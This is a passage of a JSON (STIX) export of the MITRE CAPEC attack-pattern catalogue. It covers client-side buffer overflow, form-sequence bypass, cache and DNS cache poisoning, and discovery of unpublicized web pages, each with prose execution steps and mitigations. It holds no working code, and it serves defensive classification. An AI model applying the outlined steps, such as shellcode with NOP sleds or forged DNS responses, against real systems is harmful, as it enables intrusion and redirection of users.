McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Client-side Injection-induced Buffer Overflow", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed" + ], + "x_capec_child_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Authors often use tags in HTML documents. For example\n \n In Internet Explorer 4.0 an adversary attacker supplies an overly long path in the SRC= directive, the mshtml.dll component will suffer a buffer overflow. This is a standard example of content in a Web page being directed to exploit a faulty module in the system. There are potentially thousands of different ways data can propagate into a given system, thus these kinds of attacks will continue to be found in the wild.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target client-side application: The adversary identifies a target client-side application to perform the buffer overflow on. The most common are browsers. If there is a known browser vulnerability an adversary could target that.

Experiment

  1. Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

  2. Techniques
    Many times client side applications will be open source, so an adversary can examine the source code to identify possible injection vectors.
    Examine APIs of the client-side application and look for areas where a buffer overflow might be possible.
  3. Create hostile service: The adversary creates a hostile service that will deliver content to the client-side application. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary crafts the payload in such a way that the overwritten return address is replaced with one of the adversary's choosing.

  4. Techniques
    If the client-side application is a browser, the adversary will create a service that delivers a malicious webpage to the browser.
    Create malicious shellcode that will execute when the program execution is returned to it.
    Use a NOP-sled in the overflow content to more easily \"slide\" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

  1. Overflow the buffer: Using the injection vector, the adversary delivers the content to the client-side application using the hostile service and overflows the buffer.

  2. Techniques
    If the adversary is targeting a local client-side application, they just need to use the service themselves.
    If the adversary is attempting to cause an overflow on an external user's client-side application, they must get the user to attach to their service by some other means. This could be getting a user to visit their hostile webpage to target a user's browser.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted client software communicates with an external server.", + "The targeted client software has a buffer overflow vulnerability." + ], + "x_capec_skills_required": { + "High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap requires a more in-depth knowledge and higher skill level.", + "Low": "To achieve a denial of service, an attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The client software should not install untrusted code from a non-authenticated server.", + "id": "course-of-action--2761b390-a1a6-4680-a497-a6a2c25e93c9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8a74ceb6-2d35-4bcc-9ead-f651fb717fec", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2761b390-a1a6-4680-a497-a6a2c25e93c9", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The client software should have the latest patches and should be audited for vulnerabilities before being used to 
communicate with potentially hostile servers.", + "id": "course-of-action--ce9d6c88-9b3a-4753-8f7e-6bdc4ae98b79", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3ffe9eb1-760d-4e9e-9075-29f67befc8f5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ce9d6c88-9b3a-4753-8f7e-6bdc4ae98b79", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform input validation for length of buffer inputs.", + "id": "course-of-action--4a5d5c42-670e-4977-9e5e-fec5b0d2fca3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--93d45ad5-fae3-4178-8d28-ccd3ff20216c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a5d5c42-670e-4977-9e5e-fec5b0d2fca3", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1bb78a3-4a93-4fbe-815f-5cca85a0c491", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a253c485-f225-4dd3-b0ba-dbe4b29fa134", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use an abstraction library to abstract away risky APIs. Not a complete solution.", + "id": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ffb905de-a976-4ece-aa2c-96b818a64df0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--286c9aaa-2118-48dc-bce6-6e3f41adc043", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6f20aff5-3638-4761-91c5-af43ae273927", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--115171ef-9f32-43b6-bb8a-49f0a78286e9", + "target_ref": 
"attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure all buffer uses are consistently bounds-checked.", + "id": "course-of-action--e5a5e968-cd66-49b5-bbb8-b26099ede481", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-14-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4914cfc7-c995-469b-984b-72e07bf331e0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e5a5e968-cd66-49b5-bbb8-b26099ede481", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--acdc688e-fa9d-48da-94ba-90902d7ac10d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8955156-d3d6-4db5-bc3b-595bda29964b", + "target_ref": "attack-pattern--c4a0c765-e4ca-43c2-996e-08ce13ae8f80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Some web applications require users to submit information through an ordered sequence of web forms. 
This is often done if there is a very large amount of information being collected or if information on earlier forms is used to pre-populate fields or determine which additional information the application needs to collect. An attacker who knows the names of the various forms in the sequence may be able to explicitly type in the name of a later form and navigate to it without first going through the previous forms. This can result in incomplete collection of information, incorrect assumptions about the information submitted by the attacker, or other problems that can impair the functioning of the application.", + "external_references": [ + { + "external_id": "CAPEC-140", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/140.html" + }, + { + "external_id": "CWE-372", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/372.html" + } + ], + "id": "attack-pattern--750dc5a2-e3c4-42d7-ad8a-25a7d1116f03", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Bypassing of Intermediate Forms in Multiple-Form Sets", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--649abc91-f615-4c9e-91c9-9e66131e2d78" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The target must collect information from the user in a series of forms where each form has its own URL that the attacker can anticipate and the application must fail to detect attempts to access intermediate forms without first filling out the previous forms." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits the functionality of cache technologies to cause specific data to be cached that aids the attackers' objectives. This describes any attack whereby an attacker places incorrect or harmful material in cache. The targeted cache can be an application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache). Until the cache is refreshed, most applications or clients will treat the corrupted cache value as valid. This can lead to a wide range of exploits including redirecting web browsers towards sites that install malware and repeatedly incorrect calculations based on the incorrect value.", + "external_references": [ + { + "external_id": "CAPEC-141", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/141.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "description": "Adversary-in-the-Middle: ARP Cache Poisoning", + "external_id": "T1557.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1557/002" + }, + { + "description": "Cache Poisoning", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cache_Poisoning" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-22", + "source_name": "reference_from_CAPEC", + "url": 
"http://en.wikipedia.org/wiki/DNS_cache_poisoning" + }, + { + "description": "DNS Threats and DNS Weaknesses, DNSSEC", + "external_id": "REF-23", + "source_name": "reference_from_CAPEC", + "url": "http://www.dnssec.net/dns-threats.php" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-24", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/ARP_spoofing" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-599", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses.html" + } + ], + "id": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Cache Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e", + "attack-pattern--ae3f2c33-9018-442e-9cc3-24d65c7f4974", + "attack-pattern--d845a25b-b140-438c-91d7-30b709bb6e18", + "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "attack-pattern--efbf3dcf-9f19-45de-9f49-caa87fd34681" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, an attacker sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.\n Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. 
However, before the remote DNS returns the right IP address 1.3.5.7, the attacker floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com\n When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify and explore caches: Use tools to sniff traffic and scan a network in order to locate application's cache (e.g. a web browser cache) or a public cache (e.g. a DNS or ARP cache) that may have vulnerabilities. Look for poisoning point in cache table entries.

  2. Techniques
    Run tools that check available entries in the cache.

Experiment

  1. Cause specific data to be cached: An attacker sends bogus request to the target, and then floods responses that trick a cache to remember malicious responses, which are wrong answers of queries.

  2. Techniques
    Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).

Exploit

  1. Redirect users to malicious website: As the attacker succeeds in exploiting the vulnerability, they are able to manipulate and interpose malicious response data to targeted victim queries.

  2. Techniques
    Intercept or modify a query, or send a bogus query with known credentials (such as transaction ID).
    Adversary-in-the-Middle attacks (CAPEC-94) intercept secure communication between two parties.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc" + ], + "x_capec_prerequisites": [ + "The attacker must be able to modify the value stored in a cache to match a desired value.", + "The targeted application must not be able to detect the illicit modification of the cache and must trust the cache value in its calculations." + ], + "x_capec_skills_required": { + "Medium": "To overwrite/modify targeted cache" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable client side caching.", + "id": "course-of-action--b3bb35f0-3493-4d4b-bdb9-7d820a64f6e7", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-141-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--deba223b-a821-4baf-b653-5358be0f03c4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b3bb35f0-3493-4d4b-bdb9-7d820a64f6e7", + "target_ref": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Listens for query replies on a network, and sends a notification via email when an entry changes.", + "id": "course-of-action--f60e0fe1-d821-4df9-817e-4d2a91308464", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-141-1", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f3dd06d-6976-4324-8d3c-1523b5d6f23a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f60e0fe1-d821-4df9-817e-4d2a91308464", + "target_ref": "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A domain name server translates a domain name (such as www.example.com) into an IP address that Internet hosts use to contact Internet resources. An adversary modifies a public DNS cache to cause certain names to resolve to incorrect addresses that the adversary specifies. The result is that client applications that rely upon the targeted cache for domain name resolution will be directed not to the actual address of the specified domain name but to some other address. 
Adversaries can use this to herd clients to sites that install malware on the victim's computer or to masquerade as part of a Pharming attack.", + "external_references": [ + { + "external_id": "CAPEC-142", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/142.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-349", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/349.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + }, + { + "description": "Compromise Infrastructure: DNS Server", + "external_id": "T1584.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1584/002" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-22", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/DNS_cache_poisoning" + }, + { + "description": "DNS Threats and DNS Weaknesses, DNSSEC", + "external_id": "REF-23", + "source_name": "reference_from_CAPEC", + "url": "http://www.dnssec.net/dns-threats.php" + }, + { + "description": "Vulnerability Note VU#800113, 2008--07---08, US CERT", + "external_id": "REF-27", + "source_name": "reference_from_CAPEC", + "url": "http://www.kb.cert.org/vuls/id/800113#pat" + } + ], + "id": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "DNS Cache Poisoning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + 
"attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285" + ], + "x_capec_child_of_refs": [ + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example, an adversary sends request to a local DNS server to look up www.example .com. The associated IP address of www.example.com is 1.3.5.7.\n Local DNS usually caches IP addresses and do not go to remote DNS every time. Since the local record is not found, DNS server tries to connect to remote DNS for queries. However, before the remote DNS returns the right IP address 1.3.5.7, the adversary floods local DNS with crafted responses with IP address 2.4.6.8. The result is that 2.4.6.8 is stored in DNS cache. Meanwhile, 2.4.6.8 is associated with a malicious website www.maliciousexampsle.com\n When users connect to www.example.com, the local DNS will direct it to www.maliciousexample.com, this works as part of a Pharming attack.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore resolver caches: Check DNS caches on local DNS server and client's browser with DNS cache enabled.

  2. Techniques
    Run tools that check the resolver cache in the memory to see if it contains a target DNS entry.
    Figure out if the client's browser has DNS cache enabled.

Experiment

  1. Attempt sending crafted records to DNS cache: A request is sent to the authoritative server for target website and wait for the iterative name resolver. An adversary sends bogus request to the DNS local server, and then floods responses that trick a DNS cache to remember malicious responses, which are wrong answers of DNS query.

  2. Techniques
    Adversary must know the transaction ID by intercepting a DNS query, or sending a bogus query with known transaction ID.
    If the transaction ID used to identify each query instance is randomized in some new DNS software, the attack must guess the transaction ID. Slow the response of the real DNS server by causing Denial-of-service. This gives adversaries enough time to guess transaction
    Adversary crafts DNS response with the same transaction ID as in the request. The adversary sends out DNS responses before the authorized DNS server. This forces DNS local cache stores fake DNS response (wrong answer). The fake DNS responses usually include a malicious website's IP address.

Exploit

  1. Redirect users to malicious website: As the adversary succeeds in exploiting the vulnerability, the victim connects to a malicious site using a good web site's domain name.

  2. Techniques
    Redirecting Web traffic to a site that looks enough like the original so as to not raise any suspicion.
    Adversary-in-the-Middle (CAPEC-94) intercepts secure communication between two parties.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A DNS cache must be vulnerable to some attack that allows the adversary to replace addresses in its lookup table.Client applications must trust the corrupted cashed values and utilize them for their domain name resolutions." + ], + "x_capec_resources_required": [ + "The adversary must have the resources to modify the targeted cache. In addition, in most cases the adversary will wish to host the sites to which users will be redirected, although in some cases redirecting to a third party site will accomplish the adversary's goals." + ], + "x_capec_skills_required": { + "Medium": "To overwrite/modify targeted DNS cache" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Make sure your DNS servers have been updated to the latest versions", + "id": "course-of-action--1643a615-4b7c-4a23-a477-7d01dbf9fe9d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b310b70-cd48-479c-a4a6-1e9a513c96ea", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1643a615-4b7c-4a23-a477-7d01dbf9fe9d", + "target_ref": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": 
"Configuration: UNIX services like rlogin, rsh/rcp, xhost, and nfs are all susceptible to wrong information being held in a cache. Care should be taken with these services so they do not rely upon DNS caches that have been exposed to the Internet.", + "id": "course-of-action--d2e06ab9-42c0-4da5-93f2-f6200862bebc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d75a59b5-0380-4139-9922-641a68593944", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d2e06ab9-42c0-4da5-93f2-f6200862bebc", + "target_ref": "attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configuration: Disable client side DNS caching.", + "id": "course-of-action--7e7fd1bf-64be-4c80-a438-60deb39ef6cf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-142-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f3632005-d0b9-4ed4-b5c5-337170c60644", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7e7fd1bf-64be-4c80-a438-60deb39ef6cf", + "target_ref": 
"attack-pattern--ee604341-eb03-4b00-8188-26d6e999d6dc", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches a targeted web site for web pages that have not been publicized. In doing this, the adversary may be able to gain access to information that the targeted site did not intend to make public.", + "external_references": [ + { + "external_id": "CAPEC-143", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/143.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + } + ], + "id": "attack-pattern--a20a3cc9-4a6a-4376-a2b4-777ee9df2a34", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Detect Unpublicized Web Pages", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--797f4b4e-371a-4d06-9e98-5cccb8a7ebc1" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find target web site: An adversary finds a target web site that they think may have unpublicized web pages

  2. Map the published web site: The adversary will map the published web site either by using an automated tool or by manually accessing well-known debugging or logging pages, or otherwise predictable pages within the site tree

  3. Techniques
    Use Dirbuster to brute force directories and file names to find unpublicized pages
    Find a pattern in the naming of documents and extrapolate this pattern to discover additional documents that have been created but are no longer externally linked

Experiment

  1. Try to find weaknesses or information: The adversary will try to find weaknesses or information on the unpublicized pages that the targeted site did not intend to be public

  2. Techniques
    Manually analyze files or pages for information that could be useful in a further attack
    Use a static analysis tool to find weaknesses in unpublished web pages

Exploit

  1. Follow-up attack: Use any information or weaknesses found to carry out a follow-up attack

